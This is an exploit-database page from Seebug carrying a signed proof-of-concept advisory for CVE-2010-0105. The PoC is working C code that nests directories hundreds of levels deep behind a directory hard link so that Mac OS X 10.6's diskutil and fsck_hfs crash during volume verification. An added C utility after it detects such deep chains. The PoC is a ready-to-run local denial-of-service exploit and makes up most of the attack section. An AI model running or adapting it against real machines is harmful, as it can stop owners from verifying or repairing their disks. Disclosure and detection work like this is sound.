
MacOS X 10.6 HFS File System Attack (Denial of Service)

26 Apr 2010. Reported by: Root. Type: seebug. Source: www.seebug.org

MacOS X 10.6 HFS File System DoS attack


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
/*  Proof of Concept for CVE-2010-0105
    MacOS X 10.6 hfs file system attack (Denial of Service)
    by Maksymilian Arciemowicz from SecurityReason.com
 
    http://securityreason.com/achievement_exploitalert/15
     
    NOTE:

    This DoS will be localized in the phase

    Checking multi-linked directories

    So we need to activate it with the line

        connlink("C/C","CX");

    Now we need to create a PATH_MAX/2 directory tree to make the overflow,

    and we should get diskutil and fsck_hfs exiting with sig=8
     
    ~ x$ diskutil verifyVolume /Volumes/max2
    Started filesystem verification on disk0s3 max2
    Performing live verification
    Checking Journaled HFS Plus volume
    Checking extents overflow file
    Checking catalog file
    Checking multi-linked files
    Checking catalog hierarchy
    Checking extended attributes file
    Checking multi-linked directories
    Maximum nesting of folders and directory hard links reached
    The volume max2 could not be verified completely
    Error: -9957: Filesystem verify or repair failed
    Underlying error: 8: POSIX reports: Exec format error
     
         
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <sys/types.h>
 
 
int createdir(char *name){
    if(0!=mkdir(name,((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0))| S_IWUSR
|S_IXUSR)){
        printf("Can`t create %s", name);
        exit(1);}
        else
        return 0;  
}
 
int comein(char *name){
    if(0!=chdir(name)){
        printf("Can`t chdir in to %s", name);
        exit(1);}
        else
        return 0;  
}
 
int connlink(a,b)
char *a,*b;
{
    if(0!=link(a,b)){
        printf("Can`t create link %s => %s",a,b);
        exit(1);}
        else
        return 0;  
}
 
int main(int argc,char *argv[]){
     
    int level;
    FILE *fp;
     
    if(argc==2) {
        level=atoi(argv[1]);
    }else{
        level=512; //default
    }
    createdir("C"); //create hardlink
    createdir("C/C"); //create hardlink
     
    connlink("C/C","CX"); //we need this to trigger checking of multi-linked directories
 
    comein("C");
     
    while(level--)
            printf("Level: %i mkdir:%i chdir:%i\n",level,
            createdir("C"),
            comein("C"));      
     
     
    printf("check diskutil verifyVolume /\n");
    return 0;
}
- -- 
Best Regards,
- ------------------------
pub   1024D/A6986BD6 2008-08-22
uid                  Maksymilian Arciemowicz (cxib)
<[email protected]>
sub   4096g/0889FA9A 2008-08-22
 
http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
-----BEGIN PGP SIGNATURE-----
 
iEYEARECAAYFAkvTTQsACgkQpiCeOKaYa9bHwACfSRqy8xJbJBGFvLbLIjabxMkI
to4AoMMetii9Gc7EyOK7/3+QP4ynP5kY
=IML/
-----END PGP SIGNATURE-----
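
The PoC above depends on a very deep directory chain (512 levels by default) being present when the verifier reaches "Checking multi-linked directories". The following C program is an added example, not part of the original advisory or of any Apple tool: it uses fts(3) to flag such chains on a mounted volume before a check is run. The function name audit_depth and the 100-level threshold are assumptions.

```c
/* Added example (not from the advisory): flag directory chains nested
   deeper than a chosen limit before running a filesystem check. */
#include <fts.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>

#define DEFAULT_LIMIT 100   /* assumed alert threshold, tune per site */

/* Walk `root` and count subtrees that go more than `limit` levels below it.
   Offending subtrees are reported once and pruned, so the walk itself never
   follows an oversized chain to the bottom. *deepest receives the greatest
   depth visited (root = 0, at most limit + 1 after pruning).
   Returns the number of pruned subtrees, or -1 if the walk cannot start. */
int audit_depth(const char *root, int limit, int *deepest)
{
    char *paths[] = { (char *)root, NULL };
    /* FTS_PHYSICAL: do not follow symlinks. FTS_XDEV: stay on one volume. */
    FTS *fts = fts_open(paths, FTS_PHYSICAL | FTS_XDEV, NULL);
    FTSENT *e;
    int hits = 0;

    *deepest = 0;
    if (fts == NULL)
        return -1;
    while ((e = fts_read(fts)) != NULL) {
        if (e->fts_info != FTS_D)        /* pre-order directory visits only */
            continue;
        if (e->fts_level > *deepest)
            *deepest = e->fts_level;
        if (e->fts_level > limit) {
            printf("nesting > %d at %s\n", limit, e->fts_path);
            fts_set(fts, e, FTS_SKIP);   /* do not descend any further */
            hits++;
        }
    }
    fts_close(fts);
    return hits;
}

int main(int argc, char *argv[])
{
    int deepest = 0;
    int limit = argc > 2 ? atoi(argv[2]) : DEFAULT_LIMIT;
    int hits = audit_depth(argc > 1 ? argv[1] : ".", limit, &deepest);

    printf("deepest level visited: %d, subtrees over limit: %d\n", deepest, hits);
    return hits != 0;   /* non-zero exit lets a scheduled job raise an alert */
}
```

Run it as `./audit_depth /Volumes/NAME 100`; the exit status is non-zero when any chain exceeds the limit.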
                              
